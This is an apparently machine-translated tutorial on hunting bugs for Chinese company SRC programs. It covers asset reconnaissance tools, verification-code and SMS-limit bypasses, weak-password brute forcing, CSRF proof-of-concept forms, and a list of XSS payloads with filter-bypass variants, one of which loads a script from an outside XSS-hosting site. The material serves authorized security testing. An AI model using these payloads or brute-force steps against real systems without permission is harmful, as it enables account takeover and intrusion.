How SRC gangsters exploit vulnerabilities

How SRC gangsters exploit vulnerabilities

Preliminary information collection

As the old saying goes, the essence of penetration testing is information collection. For weak players without 0day, mining SRC feels more like sorting out the company’s assets. We often need to spend a long time to collect information, collect and Information related to this company, includingthe company’s branches, wholly-owned subsidiaries, website domain names, mobile apps,WeChat mini programs, company patent brand information, company Email, phone number, etc. For many SRCs mined by thousands of people, if you collect assets that others have not collected, you are often not far from digging a vulnerability.

Collection of enterprise-related information
  • Qichacha (https://www.qcc.com)
  • Tianyancha (https://www.tianyancha.com/)
  • Qixinbao (https://www.qixin.com/) Qixincha and Tianyancha Taobao all have one-day members. It is actually sufficient for our information collection. Personally, I prefer to use Qichacha because it can export domain names with one click and can also directly view the subsidiaries associated with the company, which is more convenient.

Main inquiry information:

  1. Generally, large SRCs have many subsidiaries. Qichacha can view the subsidiaries of the group in the group it belongs to, and can export them.
  2. If you look at the same phone companies, they are basically subsidiaries.
  3. Looking at the share penetration chart, generally speaking, the vulnerability SRC of subsidiaries holding more than 50% of the shares is more likely to be included.
  4. Check the company’s apps, mini-programs, and brand assets. Searching for brands directly in search engines may yield unexpected results. (Find some assets that cannot be collected normally)

PS: Generally speaking, 100% wholly-owned subsidiary src loopholes will definitely be collected. Other subsidiary assets may need to be reviewed and communicated with src (waffling).

  • Webmaster’s Home: http://whois.chinaz.com/
    • Email counter-check, registrant counter-check, phone counter-check.
    • Recommended project: https://github.com/code-scan/BroDomain Brother domain name query.
  • https://www.qimai.cn/
    • Qimai data can be used to find some relatively unpopular apps owned by companies.

Information organization

When we collect information from the companies we mined through various means, we can roughly get the following useful information:

  • All website domain name information belonging to the main company, branches and subsidiaries;
  • All patented brands and some independent systems developed by the main company, branches and subsidiaries.
  • All app assets and WeChat mini-programs under the main company, branches and subsidiaries.

After that, we need to summarize and organize this information, such as which are the company’s main assets, which are marginal assets, and which assets seem to be less popular. We can focus on and dig deeper.

Subdomain name collection and website information collection

As for subdomain names, for me, the functions of oneforall and xray are powerful enough. For some main domain names, if you want to fully collect subdomain names, it is best to use an extra-large dictionary to blast at least three levels of subdomain names.

This is where the layer subdomain excavator is good.

Collect subdomains through github

Let me share a gesture first. Many times, enthusiastic masters on github have already shared their own subdomains, so you can first go to github to find out if there is any ready-made one that you can use for free. There is no good grammar, and you just rely on finding the needle in the haystack. .

oneforAll

https://github.com/shmilylty/OneForAll

  • You need to fill in the api interface information in the configuration file.
  • Modify other configurations according to needs. For example, you can configure some common ports and use them as a simple port scanning tool.

Order

python oneforall.py --targets ./domain.txt run
python oneforall.py --targets ./domain.txt --brute true run

copy

In actual operation, I found that the subdomains that came out when the external network proxy was connected and when the proxy was not connected were sometimes a bit different. Masters who want to collect more comprehensive information can run it both without and without the proxy. Then do some heavy lifting.

xray

Subdomain detection requires the advanced version. You can write a dozen lines of code for batch detection, or you can directly use the code in this project.

https://github.com/timwhitez/rad-xray The command can be changed to detect subdomain names in batches, usually one subdomain every 5 to 10 minutes.

Goby

Official website: https://gobies.org/

Because I have been using masscan + nmap for port scanning before, I used this project: https://github.com/hellogoldsnakeman/masnmapscan-V1.0

I came into contact with goby some time ago and I feel that the visual tool is quite comfortable to use. It can scan some common ports in a short time and fingerprint the website. The report looks quite comfortable.

copy

Because in the actual port scanning process, due to CDN or firewall reasons, there is no need to scan all ports at the beginning. According to the experience shared by a master, for example, when the scan finds that port 22 is open, it means that the IP is not protected by CDN. We can extract this kind of IP and then focus on full port scanning. The possibility of harvesting will be relatively high.

BBScan

The tool written by Master Zhuzhuxia is very fast and simple directory scanning. It can mainly detect many assets under the C segment and expand the attack surface.

project address:

https://github.com/lijiejie/BBScan

https://github.com/yhy0/BBScan (springboot leak detection added)

  • Can detect domain name, IP, C segment
  • Quickly detect the management background
  • Perform port detection
  • Detect sensitive information leaks
  • Scan rules can be customized

If you look at the report under report, there will definitely be a lot of false positives, but there may be unexpected assets under paragraph C.

JS information collection

It mainly crawls the sensitive js files of the website. The information that can be collected in js:

  • Increase attack surface (url, domain name)
  • Sensitive information (passwords, API keys, encryption methods)
  • Potentially dangerous function operations in code
  • Frameworks with known vulnerabilities

Commonly used tools

Fast jsfinder https://github.com/Threezh1/JSFinder

xray’s rad crawler https://github.com/chaitin/rad

JSINFO-SCAN capable of matching sensitive information: https://github.com/p1g3/JSINFO-SCAN

Some tips on picking out medium and low-risk vulnerabilities

When we first start mining SRC, we often don’t know where to start. First of all, we can actually look at the types of vulnerabilities collected from the drop-down box of vulnerability submission on each SRC platform.

Then learn how to mine in a targeted manner, such as the types of vulnerabilities collected by Zhaopin Recruitment SRC, we can learn the corresponding mining skills in a targeted manner.

Framework injection
 Clear text password transmission
 Form cracking vulnerability
 IIS short file name leaked
 Old and expired HTTPS service
 Cross-directory download vulnerability
 Directory browsability vulnerability
 LFI local file contains vulnerability
 RFI remote file inclusion vulnerability
 HTTP denial of service attack
 Login with weak password
 CSRF cross-site request forgery
 Flash clickjacking
 SQL injection vulnerability
 XSS cross-site scripting vulnerability
 File upload vulnerability
 Parsing Vulnerability:IIS Parsing Vulnerability
 Parsing Vulnerability:Apache Parsing Vulnerability
 Cookie injection vulnerability
 Unauthorized access vulnerability
 Command execution vulnerability
 Struts2 remote code execution vulnerability
 Business logic vulnerability
 User privacy leaked
 Sensitive information leakage (operation and maintenance)
 Sensitive information leakage (R&D)
 Sensitive file leakage (operation and maintenance) (configuration)
 Sensitive file leakage (operation and maintenance) (permissions)
 Unvalidated redirects and delivery
 Flash cross-domain resource access
 Test file leak
 Enable dangerous HTTP methods
 HTTP parameter pollution
 Unicode encoding bypass
 Source code leaks
 Backend directory leak
 Link injection vulnerability
 SSRF server request forgery
 jsonp hijack

copy

After learning the basic vulnerability types, we can look at some more actual vulnerability reports.

For example, reports on wooyun vulnerability library and hackone.

  • Wuyun vulnerability library: https://wooyun.x10sec.org/
  • hackone report: https://pan.baidu.com/s/1jPUSuoERSIDw2zCKZ0xTjA Extraction code: 2klt

Here are some garbage holes I often dig. As a human being, I can’t dig big holes. I’m sorry┭┮﹏┭┮.

Some common vulnerabilities in the login box

After we collect preliminary information about the target, the first thing that often bears the brunt is all kinds of weird login boxes. Generally speaking, in order to reduce security issues, large enterprises generally use a unified login interface to log in to different affiliated websites.

However, some backend systems, operation and maintenance systems, or some edge businesses use independent registration and login systems, and security issues often arise at this time.

The code receiving platforms that are still available:

  • http://www.114sim.com/
  • https://yunduanxin.net/China-Phone-Number/
  • https://www.materialtools.com/
Explosion, credential stuffing, and user traversal vulnerabilities caused by bypassing restrictions

The most common vulnerability, especially in some old backend systems, may be bypassed by grabbing a package with the verification code. Here are some common bypass gestures:

  • Verification code does not refresh
  • Verification code packet capture bypass
  • Verification code deletion bypass
  • Bypass the verification code by leaving it blank
  • Modify xff header bypass: recommend a burp plug-in, https://github.com/TheKingOfDuck/burpFakeIP
  • Add a space after the account number to bypass the limit on the number of account errors.

Generally speaking, if it is just a simple verification code bypass, it is generally low risk, so if you can generally bypass the verification code, you must try to crack a wave of account passwords.

Weak Password Vulnerability

When there is no verification code or the verification code can be bypassed

Just start dictionary blasting, of course there are still some tips:

  • For example, you can set a fixed weak password, such as 123456, and then blast the account.
  • For example, you can first collect some website information to create a dictionary in a targeted manner, such as domain names, employee emails, company names, etc. Recommended tool: Bailu Social Worker Dictionary Generation: https://github.com/HongLuDianXue/BaiLu-SED-Tool

The key to blasting lies in the dictionary. Common dictionaries are available on github, but ordinary weak passwords are really not easy to use now. If you want to increase the chance of success, you still need to try strong passwords and share the prophet’s article:

  • https://xz.aliyun.com/t/7823
  • https://github.com/huyuanzhi2/password_brute_dictionary

Situations where there is a verification code and cannot be bypassed

  • Github directly finds the employee account email and password.
  • Source code or js file to search for clues, email, or encrypted account password.
  • For a specific system or cms, the search engine searches for the default administrator or test password.
  • Manually try common weak passwords.
SMS messages for registration, login, and password retrieval\email bombing vulnerability

This is quite common. Generally, those who can bomb specific users will definitely be collected. Horizontal bombing can consume resources and be collected randomly.

Common bypassing postures:

  • Add spaces to bypass
  • Add any letters to bypass
  • Add 86 in front to bypass
  • xff header fake ip bypass
Any user registration, login, and password retrieval vulnerability caused by logical defects

Because once a loophole appears in this area, it is basically a high risk.

So I won’t go into details about similar ideas when digging.

There is a series of articles on freebuf about password reset for any user. The ideas for similar vulnerabilities are actually not much different:

https://www.freebuf.com/author/yangyangwithgnu

Common information leakage vulnerabilities

The scope of sensitive information leakage is very wide. I think it generally falls into two categories:

  • Internal information leakage within the enterprise due to configuration errors or improper management.
  • User data leakage (traversal) due to logical defects.
Information leakage caused by github
  • Github search keywords shared in P Niu Knowledge Planet: https://twitter.com/obheda12/status/1316513838716551169
  • github subdomain monitoring project: https://github.com/FeeiCN/GSIL
  • Common leaks: There are some cases on Dark Clouds that you can take a look at.
    • Employee internal email, login account, and password.
    • Some of the company’s internal system domain names and IPs were leaked.
    • If the engineering code and website source code of the corporate website are leaked, you can search for them through keywords in employee emails. Pay attention to the date, as there is a high probability that they will not be accepted for several years.
Information leakage caused by configuration errors

It contains many types, and the most important thing is to have a powerful enough dictionary and a useful scanner.

When I actually conduct detection, for a large number of domain names, I prefer to use a streamlined small dictionary to quickly scan first.

for example:

  • Small dictionary of backup files
  • Springboot leaked small dictionary
  • A small dictionary in the backend of the website

The more famous scanners are dirsearch, dirmap, dirbuster, etc.

Visual ones such as TEST404 series and Yujian scanners also have a good experience.

Note: The swagger-ui service leakage, which is relatively common in information leakage, may be ignored or low-risk if submitted directly. Don’t forget to further test the leaked interface function.

Information leakage caused by exceeding authority

Many times when overreaching authority comes and goes, it is a matter of changing a parameter. More often than not, you need to carefully test the business functions one by one. Pay attention to observing and testing the operating parameters and object parameters. The operating parameters are generally added, deleted, modified, and checked to correspond to the specific business. Sensitive operations and object parameters are generally users or items.

Several burp plugins are recommended:

  • Unauthorized detection: https://github.com/theLSA/burp-unauth-checker
  • Sensitive parameter extraction: https://github.com/theLSA/burp-sensitive-param-extractor
  • Information extraction: https://github.com/theLSA/burp-info-extractor

The basic function of the plug-in is to help us quickly locate sensitive parameters. Actual testing still requires us to carefully analyze the program logic package by package.

Some common situations of overreaching:

  • Override based on user ID
  • Override based on functional object ID
  • Override based on upload object ID
  • Override based on unauthorized access
  • Functional address based override
  • Interface identity-based override

Other OWASPTop10 vulnerabilities

CSRF vulnerability

The most important thing when mining CSRF vulnerabilities is to explain the harm, which is easier to argue with. Generally speaking, CSRF vulnerabilities involving user data, property, and permissions have a high probability of being closed. Generally speaking, the highest risk is medium risk. It’s still possible to pick through garbage holes.

Common vulnerability points

1. Modify personal information, email, password, and avatar

2. Publish articles

3. Add and delete comments

4. Add, modify, and delete delivery addresses

5. Add administrator

(1) GET type

GET type CSRF exploitation is very simple and only requires an HTTP request, so it is generally exploited like this:

<img src=http://www.xxxxx.com/csrf?xx=11 />

copy

(2) POST type

There is no token parameter in the POST request, and the request does not verify the referer information. This is the most common type of CSRF.

The detection method of this vulnerability is also very simple. After the web page operates a certain function, after capturing the packet, if it is found that there are no parameters such as token, then the referer information is set to empty, and the packet request is sent again. If the request is successful, it means that there is a CSRF vulnerability. .

poc (can be generated by burp yourself):

<html>
<body>
<form name="px" method="post" action="http://www.xxxxx.com/add">
<input type="text" name="user_id" value="1111">
</form>
<script>document.px.submit(); </script>
</body>
</html>

copy

The POST request data is json. When the server does not strictly verify the content-type type, the POC is:

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.xxxx.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "text/plain;charset=UTF-8"); xhr.send('{"role":admin}');
</script>

copy

3. Flash type

Flash CSRF is usually caused by improper configuration of the Crossdomain.xml file, and is exploited by using swf to initiate cross-site request forgery.

Conditions of use:

1. The crossdomain.xml file must exist under the target site

2. The configuration in crossdomain.xml allows other domains to make cross-domain requests.

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>

copy

Bypass Tips

  • Delete csrf token
  • Empty csrf token
  • Modify the request method, such as changing the POST method to a GET request
  • Replace the token with an arbitrary string of the same length as the token, for example try changing one character and see what happens
  • Use fixed token
  • Change the token field to token[]=
Arbitrary file upload vulnerability

This hole is encountered more often. Generally speaking, the backend does not limit the type of uploaded files. But the uploaded script file will not be parsed.

There is no way to getshell. (Many SRCs ignore any file uploads to the CDN cloud server).

  • Uploading HTML files containing XSS code will cause stored XSS (it will most likely be ignored if uploaded to a CDN server or the like).
  • Upload malicious files for phishing
  • Try adding …/ in front of the uploaded file name to perform directory traversal.
  • It can be combined with other vulnerabilities such as CORS vulnerabilities to amplify the damage.

The common bypass gestures for file upload should be quite familiar. . , During the actual test, it was found that when applying for corporate or personal certification, this problem often occurs in the upload file department.

XSS vulnerability

We are old acquaintances, so I won’t go into details. Everyone should know the common postures.

Share an article about me learning XSS: https://wizardforcel.gitbooks.io/xss-naxienian/content/index.html

Broken5 master’s xsspayload:

<script>alert(1)</script>
<script src=https://xsspt.com/VBAhTu></script>
<a href=javascript:alert(1)>xss</a>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<img src=https://www.baidu.com/img/bd_logo1.png onload=alert(1)>
<details open ontoggle=alert(1)>
<body onload=alert(1)>
<M onmouseover=alert(1)>M
<iframe src=javascript:alert(1)></iframe>
<iframe onload=alert(1)>
<input type="submit" onfocus=alert(1)>
<input type="submit" onclick=alert(1)>
<form><input type="submit" formaction=javascript:alert(1)>

copy

bypass posture
<!-- spaces are filtered -->
<img/src="1"/onerror=alert(1)>

<!--Double write bypass -->
<iimgmg src=1 oonerrornerror=aimglert(1)>

<!-- Case bypass -->
<iMg src=1 oNerRor=alert(1)>

<!-- Using eval() -->
<img src=1 onerror="a=`aler`;b=`t(1)`;eval(a + b);">
<img src=1 onerror=eval(atob('YWxlcnQoMSk='))>

<!--Use location -->
<img src=1 onerror=location='javascript:alert(1)'>
<img src=1 onerror=location='javascript:\x61\x6C\x65\x72\x74\x28\x31\x29'>
<img src=1 onerror=location="javascr" + "ipt:" + "alert(1)">

<!-- Brackets are filtered -->
<img src=1 onerror="window.οnerrοr=eval;throw'=alert\x281\x29';">

<!-- onerror=Filtered -->
<img src=1 onerror =alert(1)>
<img src=1 onerror
=alert(1)>

<!-- Attributes are converted to uppercase -->
<img src=1 onerror=alert(1)>

<!-- Detected after encoding -->
<img src=1 onerror=alert(1)>

copy

Submission of Threat Intelligence

I have no experience in this area, so I will share two articles with you. . . Once the information is collected, you can still try to submit it.

https://mp.weixin.qq.com/s/v2MRx7qs70lpnW9n-mJ7_Q

https://bbs.ichunqiu.com/article-921-1.html

You can try adding one plus various wool groups, and roll out the wool from the wool group with your backhand.

Some thoughts on discovering high-risk and severe vulnerabilities

Because only a few high-risk and serious vulnerabilities have been discovered, I have basically been picking up some medium and low-risk vulnerabilities. During this period, I have also read a lot of outstanding vulnerability reports, and I would like to share my thoughts.

1. Ability to automate information collection

The information collection mentioned here is more about how to use existing tools to quickly and automatically collect and organize. It must not only be fast, but also collect comprehensively without missing information. Many times, this process itself is discovering loopholes.

These tasks should be completed comprehensively in our early stage of information collection, so how to quickly and comprehensively collect information is what we need to think about and continue to practice.

2. The ability to hit loophole combination punches

SRC’s vulnerability rating mainly depends on the harm that your vulnerability can cause, so when you find some low-risk vulnerabilities, you can not rush to submit them first, and look for other exploitable points to attack the vulnerability combination.

3. Ability to bypass waf

This ability is quite lacking. The process of digging holes is basically lost when you encounter waf, especially waf from some big manufacturers. To bypass other wafs, you just directly go to some other masters.

4. Care, patience and some luck

If you dig around the world carefully and add some luck, you may be able to get it with high risk.

Summary

Mining SRC requires a good attitude. The domestic SRC ecology is not very good. SRC feels that it provides a relatively safe test guarantee, so it is more necessary to dig with a learning mentality and apply the knowledge we have learned. Use it flexibly to discover new problems.

Don’t think about how many loopholes I have to dig tonight and how much bonus I have to get, otherwise I may be ignored for three consecutive times and my mentality will be broken.

syntaxbug.com © 2021 All Rights Reserved.